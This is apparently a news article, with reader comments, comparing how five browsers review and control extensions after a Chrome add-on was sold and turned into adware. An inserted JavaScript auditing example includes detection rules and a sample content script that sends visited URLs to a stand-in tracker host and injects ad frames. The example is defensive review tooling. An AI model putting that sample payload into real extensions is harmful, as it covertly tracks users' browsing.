After Chrome’s recent extension drama, what browser has the safest add-ons?

Customers complain about activity tracking in CRXMouse on Chrome, a particularly invasive add-on.

As OMG Chrome and the developer of the Chrome extension Add to Feedly recently revealed, a Chrome extension can change owners, and change what it does, under a user's nose with little or no notification: Chrome installs extension updates silently, so whatever a new owner ships lands in every existing user's browser. In the case of Add to Feedly, a buyout meant thousands of users were suddenly subjected to injected adware and redirected links.

Chrome’s regulations for existing extensions are set to change in June 2014. The changes should prevent extensions from being anything but “simple and single-purpose in nature,” with a “single visible UI surface” in Chrome and a “single browser action or page action button,” like the extensions made by Pinterest or OneTab.

This has always been the policy, per a post to the Chromium blog back in December. But going forward, it will be enforced for all new extensions immediately and for all existing extensions retroactively beginning in June.

Given how Chrome's combination of silent updates, loose design restrictions, and transferable ownership seems to have gotten ahead of its policy, we decided to take a look at the policies of other browsers to see whether their extensions could be subjected to a similar fate. While Chrome isn't the only browser where an Add To Feedly tale could be spun, it seems to be the most likely place for such an outcome.

Firefox

Mozilla's Firefox differs from Chrome in that every extension goes through a human review before it is listed in the add-ons gallery. Reviewers will reject an extension if it violates any of the rules in Firefox's extension development documents.

One of these rules is “no surprises”—an add-on can’t do anything it doesn’t disclose to users, and existing add-ons can’t change their functionality without notifying the user and getting their permission.

Firefox puts add-ons with “unexpected” features, like advertising that supports the add-on financially, into a separate category. Users have to explicitly opt-in to these features, says Jonathan Nightingale, vice president of Firefox. “This means that in these cases, users will see a screen offering them the additional features,” says Nightingale. One example is FastestFox, which pops a tab at first install asking the user to enable ad injection from Superfish.

How developers word these opt-in screens is the possible loophole: the addition of advertising can be obscured by vague language, and so can data tracking (which is permitted under Firefox's rules, but must be disclosed in a privacy policy). Still, the review process and the opt-in requirement for these more pernicious features both help prevent users from having new functionality sprung on them.

Safari

Safari has extensive design documents for its extensions but no central clearinghouse for them like other browsers. Apple keeps a “gallery” of a chosen few extensions that must meet certain regulations, but these represent a small fraction of the extensions available.

Data tracking of an extension's users is possible, per the design docs, as is ad manipulation. Unlike Chrome, Safari lets the user approve the download and installation of extension updates manually; Firefox also exposes a setting to turn off automatic add-on updates, though its default is to install them automatically. There are no regulations for disclosing functionality changes or changes of ownership, however.

Internet Explorer

Microsoft’s browser absolves itself of responsibility for add-ons on a support page where it states, "While add-ons can make your browsing experience better by giving you access to great Web content, some add-ons can pose security, privacy, or performance risks. Make sure any add-ons you install are from a trusted source." Add on at your own risk.

Like Apple, Microsoft maintains an exclusive gallery of vetted add-ons. The company encourages extension makers to get user consent for unexpected add-on functionality, but it doesn’t require it or block extensions that don’t do it. Markup-based extensions can only be installed from within the browser, and therefore these must have the user’s explicit consent according to Microsoft.

Beyond that, nothing prevents IE add-ons from doing things like injecting ads or redirecting a browsing experience (remember, this was the former home of the invasive toolbar add-on). IE10 does have an add-on management window, but some add-ons, like the ad-injecting Buzzdcock, have to be removed as if they were full-fledged applications.

Opera

The latest versions of Opera can run Chromium extensions, but unlike in Chrome, every one of them goes through a review process similar to Firefox's. Most importantly, Opera restricts the kinds of scripts an extension can run and how it handles ads.

Andreas Bovens, head of developer relations at Opera Software, told Ars in an e-mail that Opera doesn’t “allow extensions that include ads or tracking in content scripts, so extensions that, for example, inject ads inside webpages the user visits are not allowed.” Extensions can, however, have ads in their options pages or in the pop-up that is triggered by their button in the browser’s interface.

Every extension gets a review, and the review team takes special care to suss out the nature of any obfuscated JavaScript code. If some of the code is obfuscated, reviewers ask the developers for the unobfuscated code to look at as well as a link to the obfuscation tool. That way “we can check that the input and output indeed match,” Bovens says.

“When an extension’s ownership is transferred or the extension is updated, it’s subject to the same rigorous review process as an extension that’s being submitted for the first time,” according to Bovens. An extension that goes from having no ads to injecting ads, as some Chrome extensions do, “simply would not pass [Opera’s] review process,” Bovens says.
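The two checks Bovens describes, no ads or tracking in content scripts and a hard look at obfuscated code, can be partly automated. What follows is an added example written for this article, not code from Opera, Google, or any extension developer: a triage pass over a constructed manifest.json (Chrome's manifest version 2 layout, which Opera also consumes) and a constructed content script, flagging broad host matches, page-URL collection, external loads, and dynamically built code. The extension name, file names, hosts, and rule names are all hypothetical.

```javascript
// Added example, not code from the article or from any browser vendor: a
// heuristic triage pass over an extension package. It flags the patterns the
// Opera policy above forbids (ads or tracking inside content scripts) together
// with the broad host access that lets such a script reach every page.
// The manifest and the content script below are constructed for this example.

// Host patterns that put a content script on every page the user visits.
const BROAD_MATCHES = new Set(['<all_urls>', 'http://*/*', 'https://*/*', '*://*/*']);

// Source-level patterns worth a second look in a content script. These are a
// triage aid only: minified or obfuscated code can dodge them, which is why a
// reviewer still asks for the unobfuscated source and the tool that produced
// the shipped file.
const RULES = [
  { id: 'reads-url',    re: /\blocation\.href\b|\bdocument\.URL\b/,              why: 'reads the URL of the page the user is on' },
  { id: 'remote-load',  re: /\.src\s*=\s*['"`]https?:\/\//,                       why: 'loads a resource from an external origin (beacon, ad frame, remote script)' },
  { id: 'ad-frame',     re: /createElement\(\s*['"`](?:iframe|script)['"`]\s*\)/, why: 'injects an iframe or script element into the page' },
  { id: 'dynamic-code', re: /\beval\s*\(|\bnew\s+Function\s*\(/,                  why: 'executes dynamically built code (a remote-enable trigger can hide here)' },
];

// Constructed sample manifest (hypothetical extension, manifest_version 2 layout).
const sampleManifest = {
  manifest_version: 2,
  name: 'Add to Example',
  version: '2.0.1',
  permissions: ['tabs', 'http://*/*', 'https://*/*'],
  content_scripts: [{ matches: ['<all_urls>'], js: ['inject.js'], run_at: 'document_end' }],
};

// Constructed sample content script: the shape an ad/tracking payload takes
// once it has been slipped into an update. Hosts are hypothetical.
const sampleScripts = {
  'inject.js': [
    "var u = location.href;",
    "var img = new Image();",
    "img.src = 'http://tracker.example/hit?u=' + encodeURIComponent(u);",
    "var f = document.createElement('iframe');",
    "f.src = 'http://ads.example/frame?ref=' + encodeURIComponent(u);",
    "document.body.appendChild(f);",
  ].join('\n'),
};

// Walk every content script declared in the manifest and collect findings.
function auditExtension(manifest, scripts) {
  const findings = [];
  for (const cs of manifest.content_scripts || []) {
    const matches = cs.matches || [];
    if (matches.some((m) => BROAD_MATCHES.has(m))) {
      findings.push({ id: 'broad-match', file: null, why: `content script runs on ${matches.join(', ')}` });
    }
    for (const file of cs.js || []) {
      const src = scripts[file];
      if (src === undefined) {
        findings.push({ id: 'missing-file', file, why: 'declared in manifest but absent from the package' });
        continue;
      }
      for (const rule of RULES) {
        if (rule.re.test(src)) findings.push({ id: rule.id, file, why: rule.why });
      }
    }
  }
  return findings;
}

// Apply the policy quoted above: URL collection or external loads from a
// content script that runs everywhere is a rejection; anything else that was
// flagged goes to a human reviewer; a clean package passes.
function verdict(findings) {
  const ids = new Set(findings.map((f) => f.id));
  const exfilOrAds = ids.has('remote-load') || ids.has('reads-url');
  if (ids.has('broad-match') && exfilOrAds) return 'reject';
  return ids.size > 0 ? 'review' : 'pass';
}

// Stand-alone run: list the findings for the sample package and the verdict.
const sampleFindings = auditExtension(sampleManifest, sampleScripts);
for (const f of sampleFindings) console.log(`${f.id.padEnd(12)} ${f.file || 'manifest'}: ${f.why}`);
console.log('verdict:', verdict(sampleFindings));
```

Run with node; the sample package is rejected because a script that runs on `<all_urls>` both reads the page URL and loads from external hosts. A broad-match finding on its own is not damning: a password manager or an ad blocker legitimately runs everywhere, so the verdict only rejects when broad reach and exfiltration or external loads coincide, and everything else flagged is handed to a person. The regexes catch the plain-text payload shown here and little more, which is exactly why Opera's reviewers insist on seeing unobfuscated source rather than trusting a scan.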

Retiring to the not-so-Wild West?

While Chrome's stated extension policy may be better than that of some other browsers, the breadth and depth of functionality a Chrome extension can have without any human review means that Chrome users' trust can get taken for granted. It's similar to the Google Play app store in that way: pretty much anything can make it to the market, but enough user complaints can get it taken down, as in the case of Add to Feedly and Tweet This Page.

Based on policy and practice, users who heavily rely on extensions or have been made wary of them by developers’ recent transgressions may be safer on browsers like Firefox and Opera, where regulations are a bit stricter and there are people to police them. But there can be downsides to a vetting process, too, mainly in terms of rate-limiting iteration and improvements, so it’s a matter of weighing options.

Update: In a statement from Google, the company tells Ars that it uses an "automated, proactive review process" to assess extensions before they go into the store and the company "conduct[s] ongoing scanning" of available extensions.

Promoted Comments

The fact is that dozens of popular extensions, with millions of users, are spying on every single page that you visit. It doesn't matter if you are using Google or your bank. They are sending back the unique URL to a third-party server every time.

Many of these extensions are hiding the code and have a remote-enable trigger for some future date (seriously).

Also, the new Google policy doesn't specifically say that they are going to forbid user tracking extensions, which are tracking every single page that you visit and sending it back to a third-party server... without a UI surface. (There's big money in user tracking) It would be wonderful if they would clear up the confusion and tell everybody that they won't let that happen anymore.

Quote:

nothing prevents IE add-ons from doing things like injecting ads or redirecting a browsing experience (remember, this was the former home of the invasive toolbar add-on)

Former home? This is the current home for an awful lot of crapware add-ons, like Conduit's search hijacker, or the Ask.com toolbar that still hasn't died a thousand deaths, even though it should.

75 Reader Comments

I just assume it was a case of naiveté on the part of Google's design and implementation team. You'd think they'd kind of know better but you have to have sneaky bastards who can think like that in order to plan for it.

I have adblock running (arstechnica excluded!), and saw weird ads popup everywhere, on different websites. Turned out some addon was causing that, and doing different kinds of tracking. Turned that thing off immediately. A while later the developer updated the app with an apology and removed the ads.


"This has always been the policy, per a post to the Chromium blog back in December. But going forward, it will be enforced for all new extensions immediately and for all existing extensions retroactively beginning in June."

How are they going to enforce that? I don't think they can except for the most obvious malwares that are easy to flag.

I will continue to avoid all extension/add-ons except the ones from the biggest companies that I have reasonable confidence in accountability.

"This has always been the policy, per a post to the Chromium blog back in December. " So Chrome had a policy that they never enforced and was something that developers were suppose to adhere to but Google is not going to enforce this policy until June i.e. 5 months from now. Google sounds more like a government every day. What are they waiting for? Are they allowing extensions to harvest more of our data or push more crap upon our browsers?

well, i have recently switched back to Firefox after using Chrome for the last few years. I noticed that the memory usage on Chrome kept going up while the Firefox developers worked on bringing Firefox's down. And with the latest revelations on Chrome extensions, it made even more sense for me to switch back to Firefox.

Everyone has different needs/wants/dreams/etc in a browser.... Firefox just happens to work for me...


Firefox would have to use less memory than Chrome before I switch. Improving is one thing but it's still not great.


Agreed. But some of that also depends on which extensions you have installed and how well they handle their own garbage collection and/or unused memory functions.

I had some Chrome extensions, which of course I can't remember the names, that were horrible in that respect.


Firefox certainly does use less memory if you open multiple tabs. I don't know about single tabs (I haven't done a fair test recently) but Chrome's multi-process architecture virtually guarantees it'll use more memory if you have many tabs.

Whether this actually matters is a matter of some debate. On a desktop or even a half-decent modern laptop (where memory is plentiful) I'd be surprised if there was any practical difference that a user would notice.


Every time I have tried looking at it in the past couple of years, having the same tabs up has never once resulted in Chrome using less memory then FF.

One thing to note, the Windows 8 Metro version of IE 11 (where I spend most of my browsing time) does not allow any 3rd party plugins at all.

I was actually just going to ask if there were any browsers that did this. Now what happens if a person is running the metro-style IE, but attempts to install a plugin? Does it still allow the plugin to be installed in the regular version of IE on the same machine?

Rate-limiting on Firefox updates? Obviously you don't have NoScript installed. I think it updates on a bi-hourly basis.

Just out of curiosity, are you being serious? I use Chrome but after this update junk, I am looking for a different browser. I was thinking of FF.

NoScript does update pretty frequently (daily? every other day?), but I'd rather suffer a developer being too proactive with updates than one who neglects their product.

That aside, the only reason NoScript jumps out is that the developer thoughtfully makes the "Display release notes on update" option checked by default. If you change that setting, it'll quietly update like most other extensions.


If you're in the Metro browser it gets ignored. When running the desktop browser it does allow plugins, just like earlier version of IE (sans Windows RT).

Quote:

Unlike Chrome, but like Firefox, the download and installation of Safari extension updates must be manually approved by the user.

That's not correct. By default Firefox extensions update automatically. The big difference is that they offer an option to disable that behavior (go to about:addons and click the gear to see the setting).

Safari extensions also need to be signed, so presumably a change of ownership would mean an extension also has to be signed with a new certificate. Unless the developer hands over his AppleID to the new scumbags.


I'm in the same boat. NoScripts and Adblock Plus (Ars excepted, of course), and that's it for me. I'm not even running Tab Mix Plus anymore.

Pfft, lightweight. Telnet and a basic understanding of HTTP and HTML is all you need. You get used to it. I don't even see the code. All I see is blond, brunette, redhead. Plus having to calculate CONTENT-LENGTH before entering your comment is a good way to e


NoScript is great, but Adblock always seems too, I dunno, intrusive? I use a cookie blocker (I'm using Cookie Controller) and the "Come Back 'Block Images From ad.sites'" extension instead. I love it.